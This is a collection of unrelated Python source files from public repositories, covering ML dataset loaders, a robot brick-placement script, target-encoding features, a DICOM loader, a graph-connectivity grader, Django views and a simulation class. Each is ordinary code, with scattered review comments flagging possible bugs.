    train_ds, test_ds = [], []
    skip = 100 // 20  # classes per task
    for i in range(0, 100, skip):
        tr_s, tr_e = train_idx[i], train_idx[i + skip]
        te_s, te_e = test_idx[i], test_idx[i + skip]
        train_ds += [(train_x[tr_s:tr_e], train_y[tr_s:tr_e])]
        test_ds += [(test_x[te_s:te_e], test_y[te_s:te_e])]
    train_ds, val_ds = make_valid_from_train(train_ds)
    train_ds = map(lambda x: XYDataset(x[0], x[1], **{'source': 'cifar10'}), train_ds)
    val_ds = map(lambda x: XYDataset(x[0], x[1], **{'source': 'cifar10'}), val_ds)
    test_ds = map(lambda x: XYDataset(x[0], x[1], **{'source': 'cifar10'}), test_ds)
    return train_ds, val_ds, test_ds
def get_miniimagenet(args):
    """Build 20 disjoint 5-class tasks from the mini-ImageNet image folders.

    Images are kept as file paths (XYDataset loads them lazily with the
    transform defined below).  80% of each class goes to train, 20% to test.
    NOTE(review): the mask/task_id tensors call .cuda(), so this requires a
    GPU -- confirm that is intended for every caller.
    """
    print('loading miniimagenet dataset')
    ROOT_PATH = '/Data/Miniimagenet/'
    args.use_conv = True
    args.n_tasks = 20
    args.n_classes = 100
    args.n_classes_per_task = 5
    args.input_size = (3, 84, 84)
    label2id = {}
    def get_data(setname):
        """Collect (path, label_id) for every image under ROOT_PATH/setname,
        assigning new integer ids to unseen label directories."""
        ds_dir = os.path.join(ROOT_PATH, setname)
        label_dirs = os.listdir(ds_dir)
        data, labels = [], []
        for label in label_dirs:
            label_dir = os.path.join(ds_dir, label)
            for image_file in os.listdir(label_dir):
                data.append(os.path.join(label_dir, image_file))
                if label not in label2id:
                    label_id = len(label2id)
                    label2id[label] = label_id
                label_id = label2id[label]
                labels.append(label_id)
        return data, labels
    transform = transforms.Compose([
        transforms.Resize(84),
        transforms.CenterCrop(84),
        transforms.ToTensor(),
    ])
    train_data, train_label = get_data('meta_train')
    valid_data, valid_label = get_data('meta_val')
    test_data, test_label = get_data('meta_test')
    # total of 60k examples for training, the rest for testing
    all_data = np.array(train_data + valid_data + test_data)
    all_label = np.array(train_label + valid_label + test_label)
    train_ds, test_ds = [], []
    current_train, current_test = None, None
    cat = lambda x, y: np.concatenate((x, y), axis=0)
    for i in range(args.n_classes):
        # per-class 80/20 train/test split, accumulated into the current task
        class_indices = np.argwhere(all_label == i).reshape(-1)
        class_data = all_data[class_indices]
        class_label = all_label[class_indices]
        split = int(0.8 * class_data.shape[0])
        data_train, data_test = class_data[:split], class_data[split:]
        label_train, label_test = class_label[:split], class_label[split:]
        if current_train is None:
            current_train, current_test = (data_train, label_train), (data_test, label_test)
        else:
            current_train = cat(current_train[0], data_train), cat(current_train[1], label_train)
            current_test = cat(current_test[0], data_test), cat(current_test[1], label_test)
        # every n_classes_per_task classes, close the current task
        if i % args.n_classes_per_task == (args.n_classes_per_task - 1):
            train_ds += [current_train]
            test_ds += [current_test]
            current_train, current_test = None, None
    # build masks: one one-hot class mask per task
    masks = []
    task_ids = [None for _ in range(20)]
    for task, task_data in enumerate(train_ds):
        labels = np.unique(task_data[1]) #task_data[1].unique().long()
        assert labels.shape[0] == args.n_classes_per_task
        mask = torch.zeros(args.n_classes).cuda()
        mask[labels] = 1
        masks += [mask]
        task_ids[task] = labels
    task_ids = torch.from_numpy(np.stack(task_ids)).cuda().long()
    print('task_ids', task_ids)
    # NOTE(review): here the task tuples hold numpy arrays, but
    # make_valid_from_train indexes them with torch.randperm -- confirm
    # this indexing works with the installed numpy version.
    train_ds, val_ds = make_valid_from_train(train_ds)
    train_ds = map(lambda x, y : XYDataset(x[0], x[1], **{'source':'cifar100', 'mask':y, 'task_ids':task_ids, 'transform':transform}), train_ds, masks)
    val_ds = map(lambda x, y: XYDataset(x[0], x[1], **{'source': 'cifar100', 'mask': y, 'task_ids': task_ids, 'transform': transform}), val_ds, masks)
    test_ds = map(lambda x, y : XYDataset(x[0], x[1], **{'source':'cifar100', 'mask':y, 'task_ids':task_ids, 'transform':transform}), test_ds, masks)
    return train_ds, val_ds, test_ds
def make_valid_from_train(dataset, cut=0.95):
    """Split each task's (x, y) tuple into train and validation parts.

    Samples are shuffled first so the validation set is an unbiased sample;
    the first `cut` fraction goes to train, the remainder to validation.
    """
    train_split, valid_split = [], []
    for x_task, y_task in dataset:
        order = torch.randperm(len(x_task))
        x_task, y_task = x_task[order], y_task[order]
        pivot = int(len(x_task) * cut)
        train_split.append((x_task[:pivot], y_task[:pivot]))
        valid_split.append((x_task[pivot:], y_task[pivot:]))
    return train_split, valid_split
class IIDDataset(torch.utils.data.Dataset):
    """Flattens several task DataLoaders into one i.i.d. (shuffled) dataset."""

    def __init__(self, data_loaders, seed=0):
        # Fix: `random` was referenced without ever being imported at module
        # level (only `from random import shuffle` exists there), which
        # raised a NameError; import the module locally instead.
        import random

        self.data_loader = data_loaders
        # (task_id, sample_id) pairs covering every sample of every task
        self.idx = []
        for task_id in range(len(data_loaders)):
            for i in range(len(data_loaders[task_id].dataset)):
                self.idx.append((task_id, i))
        # deterministic shuffle so epochs are reproducible for a given seed
        random.Random(seed).shuffle(self.idx)

    def __getitem__(self, idx):
        task_id, instance_id = self.idx[idx]
        return self.data_loader[task_id].dataset.__getitem__(instance_id)

    def __len__(self):
        return len(self.idx)
43319179836 | #!/usr/bin/env python
from geometry_msgs.msg import (
PoseStamped,
Pose,
Point,
Quaternion,
)
def house_coordinates(x, y, z, width, height):
    '''
    Compute brick coordinates for a wall of the requested width and height,
    built out from (x, y, z).  Returns a list with one sub-list of
    (x, y, z) tuples per layer; within a layer bricks are ordered
    middle-out (the exact middle brick first for odd-sized layers, the
    right-of-middle brick first for even-sized ones), so the right arm
    always picks the first brick of each layer.
    '''
    # Baxter reachable-workspace limits: at most 0.8 m wide, 1.04 m tall
    # (see http://mfg.rethinkrobotics.com/wiki/Workspace_Guidelines).
    if y > 0.8:
        print('You have input the maximum width!')
    if z > 1.04:
        print('You have input the maximum height!')

    t = 0.06  # brick thickness
    w = 0.09  # brick width
    h = 0.2   # brick height

    list_of_positions = []
    # Bricks per layer for the widest possible structure, bottom to top.
    layers = [5, 4, 4, 3, 3, 2, 2, 1]

    # Layer count from the height: each vertical+horizontal pair is h + t
    # tall; a remainder of at least 200 mm fits one more vertical layer.
    if (height*1000) % ((h*1000) + (t*1000)) < 200:
        number_of_layers = int(height/(h+t))*2
    else:
        number_of_layers = int(height/(h+t))*2 + 1

    # The requested width selects where in `layers` to start: narrower
    # walls skip the widest base layers (a span of 4 keeps everything).
    span = int((width*10)/(h*10))
    if span == 3:
        del layers[0:2]
    elif span == 2:
        del layers[0:4]
    elif span == 1:
        del layers[0:6]

    # A narrow wall cannot reach the full requested height: cap the layers.
    if len(layers) < number_of_layers:
        print('The width of the structure you input is too small to build this high!')
        number_of_layers = len(layers)

    # Middle-out horizontal offsets in brick heights (incl. 2 cm buffers):
    # one table for odd-sized layers, one for even-sized layers.
    coefficient_odd = [0, 1.1, -1.1, 2.2, -2.2]
    coefficient_even = [-0.55, 0.55, -1.65, 1.65]

    for layer_index in range(number_of_layers):
        count_layer = layer_index + 1
        bricks_in_layer = layers[layer_index]
        coeffs = coefficient_odd if bricks_in_layer % 2 == 1 else coefficient_even
        layer_list = []
        for brick_index in range(bricks_in_layer):
            # Horizontal offset from the wall centre line.
            brick_y = coeffs[brick_index] * h
            # Vertical position: full (h+t) pairs below this layer, plus h
            # on odd layers; -0.03 is the gripper offset from the brick top.
            brick_z = int(count_layer/2)*(h+t) + h*(count_layer % 2) - 0.03
            layer_list.append((x, brick_y, brick_z))
        list_of_positions.append(layer_list)

    print(list_of_positions)
    return list_of_positions
def posify(Coordinates, v_orientation, h_orientation):
    '''
    Convert every (x, y, z) tuple in `Coordinates` (a list of layers) into a
    geometry_msgs Pose, in place, and return the mutated list.

    Even-indexed layers (0, 2, ...) use `v_orientation` (vertical bricks);
    odd-indexed layers use `h_orientation` (horizontal bricks).
    '''
    for i in range(len(Coordinates)):
        # The two original branches were identical except for the
        # orientation, so pick it once per layer instead.
        orientation = h_orientation if i % 2 else v_orientation
        for j in range(len(Coordinates[i])):
            p, u, v = Coordinates[i][j]
            Coordinates[i][j] = Pose(
                position=Point(x=p, y=u, z=v),
                orientation=orientation)
    print(Coordinates)
    return Coordinates
| ansonthalia/DE_robotics1 | Final_Submission/House_Builder.py | House_Builder.py | py | 7,047 | python | en | code | 0 | github-code | 36 |
18488873840 | from utility import log, timeit, Timer
import CONSTANT
from concurrent.futures import ProcessPoolExecutor
import datetime
import numpy as np
import os
import pandas as pd
import CONSTANT
import gc
from CONSTANT import LABEL,NUMERICAL_PREFIX,LABEL_CNT_SUFFIX
@timeit
def cat_Lable_Cnt_Fun(train_data, y, test_data, config):
    """Build label-count (target-encoding) features for every categorical column.

    Columns are processed in chunks sized by data volume, each chunk fanned
    out over a 4-process pool running cat_Lable_Cnt_Fun_sub.  The original
    categorical columns (plus the temporary label column) are dropped from
    `train_data`/`test_data` in place; returns the list of encoded Series,
    or None when there are no categorical columns.
    """
    timer = Timer()
    cat_feature_list = [c for c in train_data if c.startswith(CONSTANT.CATEGORY_PREFIX)]
    if len(cat_feature_list) == 0: return None
    # train_data_length = len(train_data)
    # temporarily attach the label so each worker gets (feature, label) pairs
    train_data[LABEL] = y
    # split work by row volume (per million rows) and by column count (per 20)
    row_sp = int(np.ceil((len(train_data) + len(test_data)) / 1000000))
    col_sp = int(np.ceil(len(cat_feature_list) / 20))
    sp= row_sp * col_sp
    print(f' **** We should split it as {sp}, {col_sp}-{row_sp} sp to process! ****')
    cols_split = np.array_split(cat_feature_list, sp)
    data_list = []
    for i, cols in enumerate(cols_split):
        if len(cols) >= 1:
            # a fresh 4-worker pool per chunk keeps peak memory bounded
            pool = ProcessPoolExecutor(4)
            result_list = pool.map(cat_Lable_Cnt_Fun_sub,
                                   [[train_data[[col, LABEL]], test_data[[col]], col, config['pos_rate'], config[CONSTANT.TRAIN_LEN_OF_TRAIN_VAL]] for col in
                                    cols])
            pool.shutdown(wait=True)
            for i_data in result_list:
                if i_data is not None:
                    data_list += i_data
            print(f'{i} split successful')
    # feature_data = pd.concat(data_list, axis=1, copy=False)
    # feature_data.columns = name_list
    # timer.check("label count map done")
    # del data_list
    # gc.collect()
    # drop the raw categorical columns (and the temporary label) in place
    test_data.drop(cat_feature_list, axis=1, inplace=True)
    cat_feature_list+=[LABEL]
    train_data.drop(cat_feature_list, axis=1, inplace=True)
    timer.check("drop")
    return data_list
def cat_Lable_Cnt_Fun_sub(params):
    """Pool worker: build the label-count encoded Series for one categorical
    column.  `params` is [train_df, test_df, column, prior, train_length]."""
    train_df, test_df, column, prior, train_len = params
    encoded_name = NUMERICAL_PREFIX + column + LABEL_CNT_SUFFIX
    encoder = CatLabelCntClass(prior, train_len)
    encoded = [encoder.fit_transform(train_df, test_df).rename(encoded_name)]
    if not encoded:
        return None
    return encoded
class CatLabelCntClass:
    """Leak-free target (label-count) encoding for one categorical column.

    Training rows are encoded fold by fold using only statistics from
    earlier folds; validation rows use the full training part; test rows use
    all of train + validation.  Unseen categories (and the history-less
    first fold) fall back to `prior`, the global positive rate.
    """

    def __init__(self, prior, train_len_of_trainVal):
        # prior: smoothing value / fallback rate for unseen categories
        self.prior = prior
        # number of leading rows of X that belong to the training part
        self.train_len_of_trainVal = train_len_of_trainVal

    def fit_transform(self, X, test_X):
        """Return one float32 Series of encodings covering the train,
        validation and test rows (X has columns [feature, label])."""
        col = X.columns[0]
        label = X.columns[1]
        # CONSTANT.ROLLING_FOLD_WINDOW
        X_label_cnt_list = []
        num_per_fold = int(np.ceil(self.train_len_of_trainVal / CONSTANT.FOLD_NUM))
        index_range = np.arange(self.train_len_of_trainVal)
        for i in range(CONSTANT.FOLD_NUM - 1):
            # expanding window: folds [0..i] provide statistics for fold i+1
            large_split = list(index_range[ : (i+1)*num_per_fold])
            small_split = list(index_range[(i+1)*num_per_fold : (i+2)*num_per_fold])
            if len(small_split)==0: break
            label_cnt = X.iloc[large_split].groupby(col).agg({label: ['count','sum']})
            label_cnt.columns = label_cnt.columns.get_level_values(1)
            # smoothed per-category positive rate
            label_cnt['label_cnt'] = (label_cnt['sum'] + self.prior)/ (label_cnt['count'] + 1)
            label_cnt_result = X.iloc[small_split].reset_index().merge(label_cnt, how='left', on=col).fillna(value={'label_cnt':self.prior}).set_index('index')
            X_label_cnt_list.append(label_cnt_result['label_cnt'])
            del label_cnt, label_cnt_result
            if i == 0:
                # the very first fold has no history: fall back to the prior
                first_roll_data = X.iloc[large_split]
                first_roll_data['label_cnt'] = self.prior
                X_label_cnt_list.append(first_roll_data['label_cnt'])
                del first_roll_data
        # encode the validation rows using the whole training part
        index_range = np.arange(len(X))
        large_split = list(index_range[: self.train_len_of_trainVal])
        small_split = list(index_range[ self.train_len_of_trainVal:])
        label_cnt = X.iloc[large_split].groupby(col).agg({label: ['count', 'sum']})
        label_cnt.columns = label_cnt.columns.get_level_values(1)
        label_cnt['label_cnt'] = (label_cnt['sum'] + self.prior) / (label_cnt['count'] + 1)
        label_cnt_result = X.iloc[small_split].reset_index().merge(label_cnt, how='left', on=col).fillna(
            value={'label_cnt': self.prior}).set_index('index')
        X_label_cnt_list.append(label_cnt_result['label_cnt'])
        del label_cnt, label_cnt_result
        # encode the test rows using train + validation statistics
        label_cnt = X.groupby(col).agg({label: ['count', 'sum']})
        label_cnt.columns = label_cnt.columns.get_level_values(1)
        label_cnt['label_cnt'] = (label_cnt['sum'] + self.prior) / (label_cnt['count'] + 1)
        label_cnt_result = test_X.reset_index().merge(label_cnt, how='left', on=col).fillna(value={'label_cnt':self.prior}).set_index('index')
        X_label_cnt_list.append(label_cnt_result['label_cnt'])
        result = pd.concat(X_label_cnt_list, axis = 0).astype('float32')
        # result.sort_index(inplace = True)
        del label_cnt, label_cnt_result
        return result
16667044604 | import os
import pydicom
import numpy as np
import dicom_numpy
from utils import hidden_errors
from tf_utils import *
from pathlib import Path
def read_dicom_folder(dicom_folder, rescale=None):
    """Read every .dcm file in `dicom_folder` and merge the slices into one
    volume.

    Returns:
        (volume, first_slice_dataset): the merged voxel array and the
        pydicom dataset of the first slice (for metadata such as spacing).
    """
    slices = [
        pydicom.dcmread(str(dicom_folder / name))
        for name in os.listdir(dicom_folder)
        if name.endswith('.dcm')
    ]
    vol, mat = dicom_numpy.combine_slices(slices, rescale)
    return vol, slices[0]
def get_largest_dir(dirs, minsize=100):
    """Return the directory in `dirs` with the most entries, or None when the
    best candidate is not a directory or holds fewer than `minsize` entries.
    """
    def entry_count(d):
        return len(os.listdir(d)) if os.path.isdir(d) else 0

    m = max(dirs, key=entry_count)
    # Fix: the original called os.listdir(m) unconditionally, which crashed
    # with NotADirectoryError when every candidate was a plain file.
    if os.path.isdir(m) and len(os.listdir(m)) >= minsize:
        return m
    return None
def get_volume_dirs(path):
    """For every case directory under `path`, pick the series directory that
    holds the most files (the highest-resolution volume).

    Expects the CQ500 layout: <path>/<case>/<study>/'Unknown Study'/<series>/.
    Cases whose best series holds fewer than 100 files are dropped
    (get_largest_dir's default minsize).
    """
    path = Path(path)
    return list(
        filter(lambda p: p is not None,
        map( get_largest_dir, # extract subdir with most files in it (highest res volume)
        map( lambda p: list(p.iterdir()), # get list of actual volume directories
        map( lambda p: next(p.iterdir())/'Unknown Study', # cd into subfolders CQ500-CT-XX/Unknown Study/
        filter(lambda p: p.is_dir(), # Get all dirs, no files
        path.iterdir()))))) # Iterate over path directory
    )
def get_volume_gen(volume_dirs, rescale=None, tf_pts=None):
    """Make a generator that loads volumes from the directories in
    `volume_dirs`.

    Yields: (volume, transfer-function points, voxel scale, volume name).
    When `tf_pts` is None, transfer-function points are derived per volume
    from its histogram peaks.
    """
    def vol_gen():
        for vol_dir in volume_dirs:
            with hidden_errors():
                try:
                    vol, dcm = read_dicom_folder(vol_dir, rescale)
                    # Fix: was `dicom.PixelSpacing` -- `dicom` is undefined;
                    # the dataset returned above is named `dcm`.
                    vox_scl = np.array([dcm.PixelSpacing[0], dcm.PixelSpacing[1], dcm.SliceThickness]).astype(np.float32)
                    vox_scl /= vox_scl.min()
                    vol_name = str(vol_dir.parent.parent.parent.name)
                    # Fix: assigning to `tf_pts` made it local to vol_gen and
                    # raised UnboundLocalError on the first read; use a
                    # per-volume copy instead.
                    pts = tf_pts
                    if pts is None:
                        # NOTE(review): the original referenced
                        # `normalized_vol`, which is never defined; `vol` is
                        # the only volume in scope -- confirm against tf_utils.
                        peaks = get_histogram_peaks(vol)
                        pts = get_trapezoid_tf_points_from_peaks(peaks)
                except dicom_numpy.DicomImportException:
                    print(f'Could not load {vol_dir}')
                    continue
            yield vol, pts, vox_scl, vol_name
    return vol_gen()
# Public API of this module.
__all__ = ['read_dicom_folder', 'get_largest_dir', 'get_volume_gen', 'get_volume_dirs']
| xeTaiz/dvao | volume_loader.py | volume_loader.py | py | 2,556 | python | en | code | 6 | github-code | 36 |
35382251444 | #!/usr/bin/env python3
from re import M
from sys import stderr, exit
from multilanguage import Env, Lang, TALcolors
from TALinputs import TALinput
import random
import graph_connectivity_lib as gcl
from time import monotonic
# METADATA OF THIS TAL_SERVICE:
problem="graph_connectivity"
service="eval_bot_deciding_connectivity"
# (name, type) pairs of the service arguments parsed into ENV below.
args_list = [
    ("goal",str),
    ("check_also_yes_certificate",bool),
    ("check_also_no_certificate",bool),
    ("code_lang",str),
    ("lang",str)
]
ENV = Env(args_list)
TAc = TALcolors(ENV)
# LANG renders localized feedback messages; the lambda evaluates f-string templates.
LANG= Lang(ENV, TAc, lambda fstring: eval(f"f'{fstring}'"))
# Random n
n = random.randint(2, 1000)
# Random m
max_m = (n * (n-1))//2
if max_m > 10000: # Setting maximum
    max_m = 10000
# At least n-1 edges so a connected instance is possible.
m = random.randint(n-1, max_m)
stderr.write(f"n: {n}, m: {m}\n")
# NOTE(review): is_connected is hard-wired to True, so every
# "graph is not connected" branch below is currently unreachable -- confirm intended.
is_connected = True
seed = gcl.gen_instance_seed(connected=is_connected)
g = gcl.generate_graph(n, m, seed , TAc=TAc, LANG=LANG)
TAc.print(LANG.render_feedback("assigned-instance",f'Instance:\n n: {n}\nm: {m}\n seed: {seed}'), "yellow")
TAc.print(f'graph:\n{g.to_str()}', "white")
# Getting answer (y or n)
start = monotonic()
user_answer = input()
end = monotonic()
# Wall-clock time the bot took to answer (used for the efficiency verdict below).
time = end - start
stderr.write(f"user_answer: {user_answer}\n")
stderr.write(f"is_connected: {is_connected}\n")
# Checking input validity
if (user_answer == "Y" or user_answer == "y"):
    user_answer = "yes"
if (user_answer == "N" or user_answer == "n"):
    user_answer = "no"
if (user_answer!= "yes" and user_answer!="no"):
    TAc.print(LANG.render_feedback("not-input", 'Input not valid. You can say Y,N,yes,no'),"red")
    exit(0)
# Wrong answers
if(user_answer == "yes" and is_connected == False):
    TAc.print(LANG.render_feedback("wrong-not-connected", 'WRONG, the graph is not connected'),"red")
    exit(0)
if(user_answer == "no" and is_connected == True):
    TAc.print(LANG.render_feedback("wrong-connected", 'WRONG, the graph is connected'),"red")
    exit(0)
stderr.write(f"cert - {is_connected}, {ENV['check_also_yes_certificate']}\n")
# CERTIFICATE
# yes cert: the bot must exhibit a spanning tree of the graph as proof of connectivity.
if (is_connected and ENV["check_also_yes_certificate"]):
    TAc.print(LANG.render_feedback("waiting-sp-tree",f'#? waiting for your spanning tree as routing table.\n# Format: each line two numbers separated by space. Then follow m lines, one for each edge, each with two numbers in the interval [0,n).\n# These specify the tail node and the head node of the edge, in this order.\n# Any line beggining with the \'#\' character is ignored.\n# If you prefer, you can use the \'TA_send_txt_file.py\' util here to send us the lines of a file. Just plug in the util at the \'rtal connect\' command like you do with any other bot and let the util feed in the file for you rather than acting by copy and paste yourself.'), "yellow")
    # Asking and getting sp.tree length
    TAc.print(LANG.render_feedback("waiting-sp-tree-len",'# Tell me how many rows are in your spanning tree table'), "yellow")
    start = monotonic()
    sptree_len = TALinput(int, 1, TAc=TAc)
    stderr.write(f"sp.tree len: {sptree_len}\n")
    # Rebuild the claimed spanning tree edge by edge into its own graph.
    span = gcl.Graph(n)
    # has_outer_edges is cleared when the bot names an edge not present in g.
    has_outer_edges = True
    not_in_graph = []
    for i in range(sptree_len[0]):
        head, tail = TALinput(int, 2, TAc=TAc)
        head, tail = int(head),int(tail)
        # Checking if the inserted nodes are in the range [0, n]
        if tail >= n or head >= n or tail < 0 or head < 0:
            stderr.write(f"{head},{tail}\n")
            # NOTE(review): ENV["MAXN"] is not declared in args_list above, so this
            # lookup is likely to fail at runtime -- verify the intended key.
            TAc.print(LANG.render_feedback("n-at-least-1", f'# ERROR: both ends of an edge must be nodes of the graph, i.e. integers in the range [0,{ENV["MAXN"]}.'), "red")
            exit(0)
        # check the existence of the edges (and nodes)
        if(g.check_edge(head,tail)):
            span.add_edge(head, tail)
        else:
            has_outer_edges = False
            edge = (int(head),int(tail))
            not_in_graph.append(edge)
    end = monotonic()
    time_certificate = end - start
    stderr.write(f"span\n{span.to_str()}\n")
    # check if is connect
    is_certificate_correct, not_conn = span.is_connected(True)
    # The certificate is valid only if it is connected AND uses only real edges of g.
    is_certificate_correct = is_certificate_correct and has_outer_edges
# no cert
if (not is_connected and ENV["check_also_no_certificate"]):
    # Bipartition?  (not implemented yet)
    pass
if(ENV["goal"]=="correct"):
    if(ENV["check_also_yes_certificate"] or ENV["check_also_no_certificate"]):
        # NOTE(review): is_certificate_correct is only bound inside the yes-cert
        # branch above; with check_also_no_certificate alone this raises NameError.
        if is_certificate_correct:
            TAc.print(LANG.render_feedback("correct-certificate",'Good! Your certificate is correct'),"green")
        else:
            TAc.print(LANG.render_feedback("wrong-certificate",f'WRONG! Certificate is not correct'), "red")
    else:
        TAc.print(LANG.render_feedback("right",f'Right!'), "green")
# NOTE(review): threshold is 10 seconds but the message says "more than a second" -- confirm.
if time > 10:
    TAc.print(LANG.render_feedback("not-efficient",'Your algorithm as a whole is not very efficient, it takes more than a second\n'),"red")
else:
    TAc.print(LANG.render_feedback("efficient",'Your algorithm overall seems to be efficient!\n'),"green")
TAc.print("#end", "white")
exit(0)
'''
## With a list of instances increasing dimensions
instances = []
if ENV['goal'] == "linear":
increase = 1.2
else: # Quadratic
increase = 1.7
min_n = 2
max_n = 100
for i in range(8):
n = random.randint(min_n, max_n)
# Random m
max_m = (n * (n-1))//2
if max_m > 10000: # Setting maximum
max_m = 10000
m = random.randint(n-1, max_m)
stderr.write(f"n: {n}, m: {m}\n")
min_n = max_n
max_n = int(max_n*increase)
stderr.write(f"min_n: {min_n}, max_n: {max_n}\n")
# Generating graph
seed = gcl.gen_instance_seed(connected=True)
instances.append(gcl.generate_graph(n, m, seed , TAc=TAc, LANG=LANG))
# Test
for graph in instances:
TAc.print(LANG.render_feedback("assigned-instance",f'Instance:\n n: {n}\nm: {m}\n seed: {seed}'), "yellow")
TAc.print(f'graph:\n{g.to_str()}', "white")
# Getting answer (y or n)
start = monotonic()
user_answer = input()
end = monotonic()
time = end - start
stderr.write(f"user_answer: {user_answer}\n")
# Come sopra
''' | romeorizzi/TALight | example_problems/tutorial/graph_connectivity/services/eval_bot_deciding_connectivity_driver.py | eval_bot_deciding_connectivity_driver.py | py | 6,055 | python | en | code | 11 | github-code | 36 |
74120599144 | from django.db.models import Q
from django.shortcuts import render
from apps.news.models import News, HeadlineNews, BottomInfo
# View function for the home page of the site.
def index(request):
    """Render the home page with the latest news, headline slots and footer infos.

    Each headline/info slot is fetched individually with .get(); a missing or
    unpublished slot raises DoesNotExist, exactly as before.
    """
    # Three most recent news entries.
    latest_news = News.objects.order_by('-published_date')[:3]
    # Published headline and bottom-info slots.
    published_headlines = HeadlineNews.objects.filter(is_publish=True)
    published_infos = BottomInfo.objects.filter(is_publish=True)
    context = {'latest_news': latest_news}
    for slot in ('headline1', 'headline2', 'headline3'):
        context[slot] = published_headlines.get(headline=slot)
    for slot in ('info1', 'info2', 'info3'):
        context[slot] = published_infos.get(bottom_info=slot)
    return render(request, 'home/index.html', context)
# View function for the static "About us" page (nested under the home page).
def about_us(request):
    """Render the about-us template; no context data is required."""
    return render(request, 'home/about_us.html')
# View function for admin page that nested in home page
def administraion(request):
return render(request, 'home/include_admin.html') | libomun/crhs | apps/home/views.py | views.py | py | 1,287 | python | en | code | 0 | github-code | 36 |
6796248308 | import pandas
'''
features of papers used including:
1.main title
2.abstract contents
3.author
4.keywords
for both main title and abstract contents, dictionary and word counts need to be attained
expected result: a dict containing text, word count, and a dictionary
for authors, authors of each paper need to be ranked by their contribution(just weight them in order)
expected result: a list of authors
'''
# Location and filename of the input dataset (left empty; set before use).
DATA_PATH = ""
DATA_NAME = ""
class Author:
    """An author and the list of papers they (co-)authored.

    BUG FIX: the original declared `author_name`/`author_publication` as class
    attributes, so every Author instance shared one publication list; they are
    now per-instance attributes set in __init__.
    """

    def __init__(self, author_name=None):
        # Display name of the author (None until assigned).
        self.author_name = author_name
        # Papers this author contributed to, in insertion order.
        self.author_publication = []
class Paper:
    """A paper record plus derived features (word counts, vectorized keywords).

    BUG FIX: all fields were mutable class attributes shared by every Paper
    instance; they are now per-instance attributes set in __init__.
    """

    def __init__(self):
        self.title = None                # main title text
        self.abstract = None             # abstract text
        self.author_list = []            # authors, ordered by contribution
        self.word_dict = {}              # word -> count over title + abstract
        self.keywords = []               # raw keywords
        self.vectorized_keywords = []    # numeric keyword representation
        self.label = None                # class/category label
        self.index = None                # unique paper index in the corpus

    def define(self, label, title, abstract, keywords, author_list, index, word_dict=None):
        """Populate the core fields of the paper in one call."""
        self.label = label
        self.title = title
        self.abstract = abstract
        self.author_list = author_list
        self.keywords = keywords
        self.index = index
        self.word_dict = word_dict

    def computed_features(self, vectorized_keywords, keywords):
        """Attach computed keyword features (overwrites raw keywords)."""
        self.keywords = keywords
        self.vectorized_keywords = vectorized_keywords
class Daedalus:
    """Corpus accumulator: global word counts, authors, and Paper records.

    Bug fixes relative to the original version:
      * the corpus containers are per-instance now (they were shared class
        attributes, so every Daedalus instance mutated the same dicts/lists);
      * add_author creates one Author object per new author (a single Author
        instance was reused for every author before, aliasing their data);
      * add_paper passes keywords/author_list in the order Paper.define
        declares them (they were swapped at the call site).
    """

    def __init__(self):
        self.corpus_word_dictionary = dict()  # word -> corpus-wide count
        self.corpus_author_list = dict()      # author name -> Author object
        self.corpus_paper_list = list()       # Paper records, insertion order

    def query_something(self, subject, target, sign):
        """Look up `subject` in `target`.

        If `sign` is truthy, `target` is an iterable of words: return 1 when
        `subject` occurs in it, else 0.  If `sign` is falsy, `target` is a
        dict whose values may be Author objects: return `subject` when an
        author with that name exists, else 0.
        """
        if sign:
            return 1 if subject in target else 0
        for element in target.values():
            if isinstance(element, Author) and element.author_name == subject:
                return subject
        return 0

    def _count_words(self, words, word_dict):
        """Tally `words` into `word_dict` and the corpus-wide dictionary."""
        for word in words:
            word_dict[word] = word_dict.get(word, 0) + 1
            self.corpus_word_dictionary[word] = self.corpus_word_dictionary.get(word, 0) + 1

    def add_paper(self, paper):
        """Register `paper`: count title/abstract words and store a Paper copy."""
        word_dict = dict()  # per-paper word counts (title + abstract)
        self._count_words(paper.title.split(), word_dict)
        self._count_words(paper.abstract.split(), word_dict)
        p = Paper()
        # Argument order follows Paper.define(label, title, abstract, keywords,
        # author_list, index, word_dict); the original call swapped
        # keywords/author_list.
        p.define(paper.label, paper.title, paper.abstract,
                 paper.keywords, paper.author_list, paper.index, word_dict)
        self.corpus_paper_list.append(p)

    # fetch the authors of each paper
    def add_author(self, paper):
        """Register every author of `paper` (comma-separated author_list)."""
        for author in paper.author_list.split(','):
            existing = self.corpus_author_list.get(author)
            if existing is None:
                # Fresh Author per new name; the original reused one shared
                # instance for all authors.
                person = Author()
                person.author_name = author
                person.author_publication = [paper]
                self.corpus_author_list[author] = person
            else:
                existing.author_publication.append(paper)

    def find_paper(self, index):
        """Return the stored Paper with matching index, or 0 when absent.

        Returning 0 (not None) preserves the original contract for callers.
        """
        for paper in self.corpus_paper_list:
            if paper.index == index:
                return paper
        return 0
# def whole_paper(self, paper):
| another1s/ontology_learning | program/analyse.py | analyse.py | py | 4,163 | python | en | code | 2 | github-code | 36 |
72167483303 | """
This file holds the interaction sites class used in simulation.py.
"""
import warnings
from random import random
from copy import deepcopy
from itertools import combinations
from math import comb
import numpy as np
class InteractionSites:
"""A class designed to host interactions between persons within specific locations.
There are currently 7 different locations that can host interactions between
person objects.
All attributes are passed through the sim_obj, which accesses the simulation
configuration file. Outlined below are the main object attributes that provide the
interaction functionality.
Attributes
----------
grade_A_sites : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
        Designed to represent restaurants, gas stations, retail stores, etc. Any location where you
do not visit often, but attend a wide variety of them.
grade_B_sites : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
Designed to represent a gym, grocery store, etc. Any location where
        you visit semi-often, and are likely to visit the same one, but this may vary.
grade_C_sites : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
Designed to represent offices or schools. Any location where they are
visited almost every workday, and you almost always visit the same one.
house_sites : :obj:`np.array` of :obj:`list` of :obj:`int`
Visited by every person each day, and hosts interactions between members
of the same household. Infection spread at home is not defined by explicit contacts,
but by a known spread factor.
lect_sites : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
Designed to replicate university lecture hall interactions. They are only visited by students.
study_sites : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
Designed to replicate study environments at university, on-campus (library, bookable rooms, ...).
They are only visited by students.
food_sites : :obj:`np.array` of :obj:`list` of :obj:`np.array` of :obj:`int`
Designed to replicate cafeteria and restaurant interactions on-campus. Only visited by students.
res_sites : :obj:`list` of :obj:`np.array` of :obj:`int`
